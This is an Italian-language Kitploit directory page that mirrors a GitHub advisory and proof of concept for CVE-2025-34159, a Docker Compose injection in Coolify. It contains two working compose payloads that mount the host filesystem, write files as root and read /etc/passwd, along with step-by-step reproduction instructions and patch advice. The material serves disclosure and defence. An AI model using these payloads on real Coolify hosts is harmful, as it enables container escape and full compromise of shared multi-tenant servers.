Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-34159 — Una vulnerabilità critica di Remote Code Execution (RCE) esiste nel flusso di lavoro di distribuzione delle applicazioni di Coolify. Questa falla consente a un membro con privilegi bassi di iniettare direttive Docker Compose arbitrarie durante la creazione o l'aggiornamento del progetto. Definendo un servizio dannoso che monta il file system host, un attaccante può ottenere l'esecuzione di comandi a livello root su | Kitploit
Strumenti/GitHubGitHub/eyodav/cve-2025-34159
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza CloudConfigurazione ErrataRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Una vulnerabilità critica di Remote Code Execution (RCE) esiste nel flusso di lavoro di distribuzione delle applicazioni di Coolify. Questa falla consente a un membro con privilegi bassi di iniettare direttive Docker Compose arbitrarie durante la creazione o l'aggiornamento del progetto. Definendo un servizio dannoso che monta il file system host, un attaccante può ottenere l'esecuzione di comandi a livello root su

GitHub
eyodav/cve-2025-34159

CVE-2025-34159

Vedi Repository
151 anno faNon ancora revisionato
Condividi

CVE-2025-34159: Iniezione di Docker Compose in Coolify

Panoramica della Vulnerabilità

CampoValore
ID CVECVE-2025-34159
InteressaCoolify ≤ v4.0.0-beta.420.6
Corretta inv4.0.0-beta.420.7
GravitàCritica
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (Iniezione di comandi del sistema operativo), CWE-20 (Validazione degli input non corretta)

Sintesi Esecutiva

Una vulnerabilità critica di esecuzione di codice remoto (Remote Code Execution, RCE) è presente nel flusso di lavoro di distribuzione delle applicazioni di Coolify. Questa falla consente a un membro con privilegi limitati di iniettare direttive Docker Compose arbitrarie durante la creazione o l'aggiornamento di un progetto. Definendo un servizio dannoso che monta il filesystem dell'host, un attaccante può ottenere l'esecuzione di comandi a livello di root sul sistema operativo host, bypassando completamente l'isolamento dei container.


Impatto sulla Sicurezza

  • Esecuzione di comandi arbitrari sul sistema host con privilegi di root
  • Compromissione completa dell'host, inclusa la possibilità di leggere/scrivere file di sistema, stabilire la persistenza ed eseguire movimenti laterali
  • Violazione della sicurezza multi-tenant, che potrebbe compromettere altri utenti e team sulla stessa istanza
  • Bypass dei controlli di sicurezza, rendendo irrilevanti le restrizioni di accesso al terminale dell'interfaccia web (controlli 403)

Dettagli Tecnici

Versioni Interessate

  • Versioni Vulnerabili: Coolify ≤ v4.0.0-beta.420.6
  • Versione Corretta: v4.0.0-beta.420.7

Vettore di Attacco

La vulnerabilità risiede nel flusso di lavoro di distribuzione dei progetti, in cui le configurazioni Docker Compose fornite dall'utente vengono elaborate senza una sufficiente validazione o sandboxing.


Prova di Concetto

PoC 1: Montaggio della Root dell'Host con Esecuzione di Comandi

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

Risultato: Dopo la distribuzione, /tmp/proof_rce.txt appare sul sistema host, confermando la RCE con privilegi di root.

PoC 2: Scrittura Mirata su un Percorso dell'Host

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

Passaggi per la Riproduzione

  1. Autenticarsi come utente di livello membro (non amministratore)
  2. Creare o modificare un progetto in Coolify
  3. Fornire una configurazione dannosa utilizzando uno dei payload Docker Compose sopra indicati
  4. Distribuire il progetto
  5. Verificare lo sfruttamento controllando gli artefatti sul lato host (es. /tmp/proof_rce.txt) o esaminando l'output dei comandi nei log di distribuzione

Azioni Immediati

  1. Eseguire subito l'aggiornamento a Coolify v4.0.0-beta.420.7 o successiva
  2. Esaminare i progetti esistenti per individuare eventuali configurazioni Docker Compose potenzialmente dannose

Riferimenti

  • Note di Patch/Rilascio: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • Repository dell'Advisory/PoC: https://github.com/Eyodav/CVE-2025-34159
Scarica lo strumento